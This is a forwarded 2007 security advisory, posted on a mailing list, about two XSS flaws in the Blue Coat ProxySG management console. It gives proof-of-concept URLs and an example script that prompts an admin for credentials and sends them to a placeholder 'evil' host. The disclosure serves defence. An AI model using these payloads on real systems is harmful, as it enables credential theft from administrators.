[isalist] FW: Two XSS on Blue Coat ProxySG Management Console
- From: Jim Harrison <Jim@xxxxxxxxxxxx>
- To: "'isalist@xxxxxxxxxxxxx'" <isalist@xxxxxxxxxxxxx>
- Date: Fri, 2 Nov 2007 06:43:07 -0700
http://www.ISAserver.org
-------------------------------------------------------
This is why I dislike web-based admin.
The standard threats to any application protocol are enough (RPC protocols are
especially fun).
Adding any browser to the management process increases the attack surface far
more than the "convenience" justifies, IMHO.
-----Original Message-----
From: research@xxxxxxxxxxxxxx [mailto:research@xxxxxxxxxxxxxx]
Sent: Thursday, November 01, 2007 10:20 AM
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Two XSS on Blue Coat ProxySG Management Console
PR07-29: Two XSS on Blue Coat ProxySG Management Console
Vulnerability found: 23 July 2007
Vendor informed: 20 August 2007
Vulnerability fixed: 29 October 2007
Advisory publicly released: 1 November 2007
Severity: Medium
Description:
Blue Coat SG400 is vulnerable to a couple of XSS holes.
Vulnerable server-side script / unfiltered parameter:
'/Secure/Local/console/install_upload_action/crl_format' / 'name'
Vulnerable server-side script / unfiltered parameter:
'/Secure/Local/console/install_upload_from_file.htm' / 'file'
Notes:
The admin user needs to be authenticated (HTTP basic authentication) for the
injected JavaScript to run.
Successfully tested on:
Model: Blue Coat SG400
Software SGOS 4.2.1.6
Software Release ID: 25173
Proof of concept #1:
https://target:8082/Secure/Local/console/install_upload_action/crl_format?name=";<script>alert("XSS")</script>%00
Injected payload:
"<script>alert("XSS")</script>%00
Proof of concept #2:
https://target:8082/Secure/Local/console/install_upload_from_file.htm?file=<script>alert("XSS")</script><!--
Injected payload:
<script>alert("XSS")</script><!--
A neat payload to inject instead of a alert() box would be a phishing attack
which would forward the username and password to a third-party site (the code
could be inserted from a third-party site).
i.e.:
<script>
do {
a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your
USERNAME","");
b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your
PASSWORD","");
}while(a==null || b==null || a=="" || b=="");
alert("owned!:"+a+"/"+b);window.location="http://evil/?u="+a+"&p="+b
</script><!--
Consequences:
An attacker may be able to cause execution of malicious scripting code in the
browser of a Blue Coat SG400 admin who clicks on a link to a Blue Coat ProxySG
Management Console. Such code would run within the context of the target domain.
This type of attack can result in non-persistent defacement of the target site,
or the redirection of confidential information (i.e.: basic auth credentials
stolen through a phishing attack as described in the Proof of Concept) to
unauthorised third parties.
Fixed in:
4.2.6.1, 5.2.2.5
References:
http://www.procheckup.com/Vulnerability_2007.php
http://www.bluecoat.com/support/securityadvisories/advisory_cross-site_scripting_vulnerability
Credits: Adrian Pastor from ProCheckUp Ltd (www.procheckup.com)
------------------------------------------------------
List Archives: //www.freelists.org/archives/isalist/
ISA Server Newsletter: http://www.isaserver.org/pages/newsletter.asp
ISA Server Articles and Tutorials: http://www.isaserver.org/articles_tutorials/
ISA Server Blogs: http://blogs.isaserver.org/
------------------------------------------------------
Visit TechGenix.com for more information about our other sites:
http://www.techgenix.com
------------------------------------------------------
To unsubscribe visit http://www.isaserver.org/pages/isalist.asp
Report abuse to listadmin@xxxxxxxxxxxxx
Other related posts:
- » [isalist] FW: Two XSS on Blue Coat ProxySG Management Console
